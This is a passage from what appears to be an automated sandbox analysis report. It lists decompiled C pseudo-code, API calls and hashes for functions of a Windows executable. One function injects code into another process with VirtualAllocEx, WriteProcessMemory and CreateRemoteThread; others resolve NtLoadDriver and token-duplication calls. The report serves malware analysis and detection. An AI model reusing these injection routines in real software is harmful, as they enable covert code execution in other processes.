                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                                                                                                                          0x004095da
                                                                                                                                                                                                                          0x004095da
                                                                                                                                                                                                                          0x004095de
                                                                                                                                                                                                                          0x004095e1
                                                                                                                                                                                                                          0x004095e7
                                                                                                                                                                                                                          0x004095e7
                                                                                                                                                                                                                          0x004095ee
                                                                                                                                                                                                                          0x004095fc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                                                                          • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                                                                                                                          0x0040a3d0
                                                                                                                                                                                                                          0x0040a3d9

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                                                                          • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                                                                                          0x00408e38
                                                                                                                                                                                                                          0x00408e44
                                                                                                                                                                                                                          0x00408e56
                                                                                                                                                                                                                          0x00408e68
                                                                                                                                                                                                                          0x00408e7a
                                                                                                                                                                                                                          0x00408e8c
                                                                                                                                                                                                                          0x00408e9e
                                                                                                                                                                                                                          0x00408eb0
                                                                                                                                                                                                                          0x00408ec2
                                                                                                                                                                                                                          0x00408ed4
                                                                                                                                                                                                                          0x00408ee6
                                                                                                                                                                                                                          0x00408ef8
                                                                                                                                                                                                                          0x00408f0a
                                                                                                                                                                                                                          0x00408f1c
                                                                                                                                                                                                                          0x00408f21
                                                                                                                                                                                                                          0x00408f23
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408f28
                                                                                                                                                                                                                          0x00408f29

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 667068680-4280973841
                                                                                                                                                                                                                          • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                                                                                                                          0x0040a474
                                                                                                                                                                                                                          0x0040a47b
                                                                                                                                                                                                                          0x0040a48a
                                                                                                                                                                                                                          0x0040a48d
                                                                                                                                                                                                                          0x0040a48f
                                                                                                                                                                                                                          0x0040a497
                                                                                                                                                                                                                          0x0040a49a
                                                                                                                                                                                                                          0x0040a6f7
                                                                                                                                                                                                                          0x0040a6f9
                                                                                                                                                                                                                          0x0040a700
                                                                                                                                                                                                                          0x0040a700
                                                                                                                                                                                                                          0x0040a4ad
                                                                                                                                                                                                                          0x0040a4b3
                                                                                                                                                                                                                          0x0040a4b8
                                                                                                                                                                                                                          0x0040a4c6
                                                                                                                                                                                                                          0x0040a4cc
                                                                                                                                                                                                                          0x0040a4cf
                                                                                                                                                                                                                          0x0040a4dd
                                                                                                                                                                                                                          0x0040a4e2
                                                                                                                                                                                                                          0x0040a4e3
                                                                                                                                                                                                                          0x0040a4ea
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4e5
                                                                                                                                                                                                                          0x0040a4ec
                                                                                                                                                                                                                          0x0040a4f6
                                                                                                                                                                                                                          0x0040a4fe
                                                                                                                                                                                                                          0x0040a503
                                                                                                                                                                                                                          0x0040a504
                                                                                                                                                                                                                          0x0040a50b
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a506
                                                                                                                                                                                                                          0x0040a50d
                                                                                                                                                                                                                          0x0040a512
                                                                                                                                                                                                                          0x0040a518
                                                                                                                                                                                                                          0x0040a51c
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a523
                                                                                                                                                                                                                          0x0040a528
                                                                                                                                                                                                                          0x0040a537
                                                                                                                                                                                                                          0x0040a54c
                                                                                                                                                                                                                          0x0040a539
                                                                                                                                                                                                                          0x0040a544
                                                                                                                                                                                                                          0x0040a549
                                                                                                                                                                                                                          0x0040a558
                                                                                                                                                                                                                          0x0040a56d
                                                                                                                                                                                                                          0x0040a55a
                                                                                                                                                                                                                          0x0040a565
                                                                                                                                                                                                                          0x0040a56a
                                                                                                                                                                                                                          0x0040a579
                                                                                                                                                                                                                          0x0040a591
                                                                                                                                                                                                                          0x0040a57b
                                                                                                                                                                                                                          0x0040a589
                                                                                                                                                                                                                          0x0040a58e
                                                                                                                                                                                                                          0x0040a5b4
                                                                                                                                                                                                                          0x0040a5b7
                                                                                                                                                                                                                          0x0040a5cc
                                                                                                                                                                                                                          0x0040a5cf
                                                                                                                                                                                                                          0x0040a5d4
                                                                                                                                                                                                                          0x0040a5d7
                                                                                                                                                                                                                          0x0040a6ed
                                                                                                                                                                                                                          0x0040a5e5
                                                                                                                                                                                                                          0x0040a5fa
                                                                                                                                                                                                                          0x0040a60b
                                                                                                                                                                                                                          0x0040a61a
                                                                                                                                                                                                                          0x0040a620
                                                                                                                                                                                                                          0x0040a623
                                                                                                                                                                                                                          0x0040a62b
                                                                                                                                                                                                                          0x0040a62f
                                                                                                                                                                                                                          0x0040a632
                                                                                                                                                                                                                          0x0040a659
                                                                                                                                                                                                                          0x0040a634
                                                                                                                                                                                                                          0x0040a635
                                                                                                                                                                                                                          0x0040a641
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a648
                                                                                                                                                                                                                          0x0040a668
                                                                                                                                                                                                                          0x0040a66e
                                                                                                                                                                                                                          0x0040a685
                                                                                                                                                                                                                          0x0040a69e
                                                                                                                                                                                                                          0x0040a6a8
                                                                                                                                                                                                                          0x0040a6ad
                                                                                                                                                                                                                          0x0040a6bd
                                                                                                                                                                                                                          0x0040a6c5
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d0
                                                                                                                                                                                                                          0x0040a6d1
                                                                                                                                                                                                                          0x0040a6d2
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6d3
                                                                                                                                                                                                                          0x0040a6c8
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6dc
                                                                                                                                                                                                                          0x0040a6d7
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A4B3
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                            • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                            • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                                                                          • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1572607441-20550370
                                                                                                                                                                                                                          • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                                                                                                                          0x004028a3
                                                                                                                                                                                                                          0x004028ab
                                                                                                                                                                                                                          0x004028bd
                                                                                                                                                                                                                          0x004028ca
                                                                                                                                                                                                                          0x004028d7
                                                                                                                                                                                                                          0x004028e3
                                                                                                                                                                                                                          0x004028e6
                                                                                                                                                                                                                          0x004028e8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004028eb
                                                                                                                                                                                                                          0x004028ec

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2238633743-1970996977
                                                                                                                                                                                                                          • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
